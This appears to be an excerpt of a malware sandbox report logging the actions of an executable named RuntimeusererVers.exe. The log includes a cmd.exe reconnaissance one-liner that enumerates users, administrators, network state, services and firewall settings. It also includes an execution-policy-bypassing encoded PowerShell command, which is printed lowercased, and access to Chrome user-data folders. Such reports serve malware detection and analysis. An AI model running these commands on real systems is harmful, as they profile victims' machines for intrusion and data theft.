                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "echo ####system info#### & systeminfo & echo ####system version#### & ver & echo ####host name#### & hostname & echo ####environment variable#### & set & echo ####logical disk#### & wmic logicaldisk get caption,description,providername & echo ####user info#### & net user & echo ####online user#### & query user & echo ####local group#### & net localgroup & echo ####administrators info#### & net localgroup administrators & echo ####guest user info#### & net user guest & echo ####administrator user info#### & net user administrator & echo ####startup info#### & wmic startup get caption,command & echo ####tasklist#### & tasklist /svc & echo ####ipconfig#### & ipconfig/all & echo ####hosts#### & type c:\windows\system32\drivers\etc\hosts & echo ####route table#### & route print & echo ####arp info#### & arp -a & echo ####netstat#### & netstat -ano & echo ####service info#### & sc query type= service state= all & echo ####firewallinfo#### & netsh firewall show state & netsh firewall show config"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "echo ####system info#### & systeminfo & echo ####system version#### & ver & echo ####host name#### & hostname & echo ####environment variable#### & set & echo ####logical disk#### & wmic logicaldisk get caption,description,providername & echo ####user info#### & net user & echo ####online user#### & query user & echo ####local group#### & net localgroup & echo ####administrators info#### & net localgroup administrators & echo ####guest user info#### & net user guest & echo ####administrator user info#### & net user administrator & echo ####startup info#### & wmic startup get caption,command & echo ####tasklist#### & tasklist /svc & echo ####ipconfig#### & ipconfig/all & echo ####hosts#### & type c:\windows\system32\drivers\etc\hosts & echo ####route table#### & route print & echo ####arp info#### & arp -a & echo ####netstat#### & netstat -ano & echo ####service info#### & sc query type= service state= all & echo ####firewallinfo#### & netsh firewall show state & netsh firewall show config"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_ssl.pyd VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_ssl.pyd VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_ssl.pyd VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_ssl.pyd VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\multidict VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\multidict VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\multidict VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\RuntimeusererVers.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\RuntimeusererVers.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\RuntimeusererVers.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\RuntimeusererVers.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\025af778-db9d-49f0-b172-4eb563717cb5 VolumeInformationJump to behavior
